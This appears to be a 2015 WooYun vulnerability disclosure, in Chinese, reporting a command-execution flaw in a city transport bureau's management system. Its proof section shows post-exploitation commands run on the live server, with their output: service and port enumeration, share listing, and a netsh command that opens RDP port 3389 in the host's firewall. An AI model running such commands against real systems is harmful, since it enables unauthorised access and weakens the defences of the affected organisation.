当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152982

漏洞标题:某市交通局某管理系统命令执行漏洞getshell

相关厂商:cncert国家互联网应急中心

漏洞作者: 朱元璋

提交时间:2015-11-10 18:58

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

地址**.**.**.**:8080/data/login.action存在命令执行漏洞

0.png


漏洞证明:

net start

 已经启动以下 Windows 服务: 
Apache Tomcat 7.0 Tomcat7
Application Experience
Application Information
Base Filtering Engine
Certificate Propagation
COM+ Event System
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
DNS Client
Group Policy Client
IP Helper
IPsec Policy Agent
Network Connections
Network List Service
Network Location Awareness
Network Store Interface Service
Plug and Play
Power
Print Spooler
 


netstat -ano

 
活动连接
协议 本地地址 外部地址 状态 PID
TCP **.**.**.**:23 **.**.**.**:0 LISTENING 3796
TCP **.**.**.**:25 **.**.**.**:0 LISTENING 3796
TCP **.**.**.**:80 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:110 **.**.**.**:0 LISTENING 3796
TCP **.**.**.**:119 **.**.**.**:0 LISTENING 3796
TCP **.**.**.**:135 **.**.**.**:0 LISTENING 688
TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:808 **.**.**.**:0 LISTENING 3796
TCP **.**.**.**:1080 **.**.**.**:0 LISTENING 3796
TCP **.**.**.**:1433 **.**.**.**:0 LISTENING 2380
TCP **.**.**.**:2121 **.**.**.**:0 LISTENING 3796
TCP **.**.**.**:2383 **.**.**.**:0 LISTENING 1324
TCP **.**.**.**:7611 **.**.**.**:0 LISTENING 1432
TCP **.**.**.**:7612 **.**.**.**:0 LISTENING 2328
TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 3452
TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 3452
TCP **.**.**.**:10123 **.**.**.**:0 LISTENING 1432
TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 412
TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 784
TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 828
TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 508
TCP **.**.**.**:49156 **.**.**.**:0 LISTENING 500
TCP **.**.**.**:55723 **.**.**.**:0 LISTENING 1432
TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:808 **.**.**.**:1340 TIME_WAIT 0
TCP **.**.**.**:808 **.**.**.**:49162 FIN_WAIT_2 3796
TCP **.**.**.**:808 **.**.**.**:49432 FIN_WAIT_2 3796
TCP **.**.**.**:808 **.**.**.**:49650 TIME_WAIT 0
TCP **.**.**.**:808 **.**.**.**:49651 ESTABLISHED 3796
TCP **.**.**.**:51968 **.**.**.**:80 ESTABLISHED 3796
TCP **.**.**.**:1433 **.**.**.**:51977 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:51978 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:51979 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:51980 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:51981 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:51982 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:51983 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:51984 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:51985 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:51986 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:55718 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:55736 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:55737 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:55738 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:55740 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:55741 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:55742 ESTABLISHED 2380
TCP **.**.**.**:1433 **.**.**.**:55746 ESTABLISHED 2380
TCP **.**.**.**:1434 **.**.**.**:0 LISTENING 2380
TCP **.**.**.**:8001 **.**.**.**:0 LISTENING 3796
TCP **.**.**.**:8001 **.**.**.**:61922 ESTABLISHED 3796
TCP **.**.**.**:8001 **.**.**.**:61923 ESTABLISHED 3796
TCP **.**.**.**:8005 0.0.0 


net share

 共享名       资源                            注解
-------------------------------------------------------------------------------
IPC$ 远程 IPC  


netsh firewall set portopening TCP 3389

 
重要信息: 已成功执行命令。
但不赞成使用 "netsh firewall";
而应该使用 "netsh advfirewall firewall"。
有关使用 "netsh advfirewall firewall" 命令
而非 "netsh firewall" 的详细信息,请参阅
http://**.**.**.**/fwlink/?linkid=121488
上的 KB 文章 947709。
 


修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-20 16:54

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无